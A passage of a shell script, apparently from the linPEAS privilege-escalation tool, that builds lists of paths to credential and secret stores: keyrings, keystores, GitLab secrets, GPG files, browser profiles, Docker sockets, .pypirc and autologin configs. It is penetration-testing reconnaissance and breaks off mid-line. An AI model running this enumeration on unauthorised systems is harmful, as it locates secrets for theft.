PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.irssi$" | sort | uniq | head -n 70) PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.irssi$" | sort | uniq | head -n 70)
PSTORAGE_KEYRING=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) PSTORAGE_KEYRING=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70)
PSTORAGE_FILEZILLA=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) PSTORAGE_FILEZILLA=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70)
PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70)
PSTORAGE_SPLUNK=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "passwd$" | sort | uniq | head -n 70) PSTORAGE_SPLUNK=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "passwd$" | sort | uniq | head -n 70)
PSTORAGE_GITLAB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '/lib' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) PSTORAGE_GITLAB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '/lib' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70)
PSTORAGE_PGP_GPG=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E 'README.gnupg' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) PSTORAGE_PGP_GPG=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E 'README.gnupg' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70)
PSTORAGE_CACHE_VI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) PSTORAGE_CACHE_VI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70)
PSTORAGE_DOCKER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) PSTORAGE_DOCKER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70)
PSTORAGE_FIREFOX=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) PSTORAGE_FIREFOX=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70)
PSTORAGE_CHROME=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) PSTORAGE_CHROME=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70)
PSTORAGE_OPERA=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) PSTORAGE_OPERA=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70)
PSTORAGE_SAFARI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) PSTORAGE_SAFARI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70)
PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70)
PSTORAGE_FASTCGI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) PSTORAGE_FASTCGI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "fastcgi_params$" | sort | uniq | head -n 70)
PSTORAGE_SNMP=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) PSTORAGE_SNMP=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70)
PSTORAGE_PYPIRC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.pypirc$" | sort | uniq | head -n 70) PSTORAGE_PYPIRC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.pypirc$" | sort | uniq | head -n 70)
PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "postfix$" | sort | uniq | head -n 70) PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E 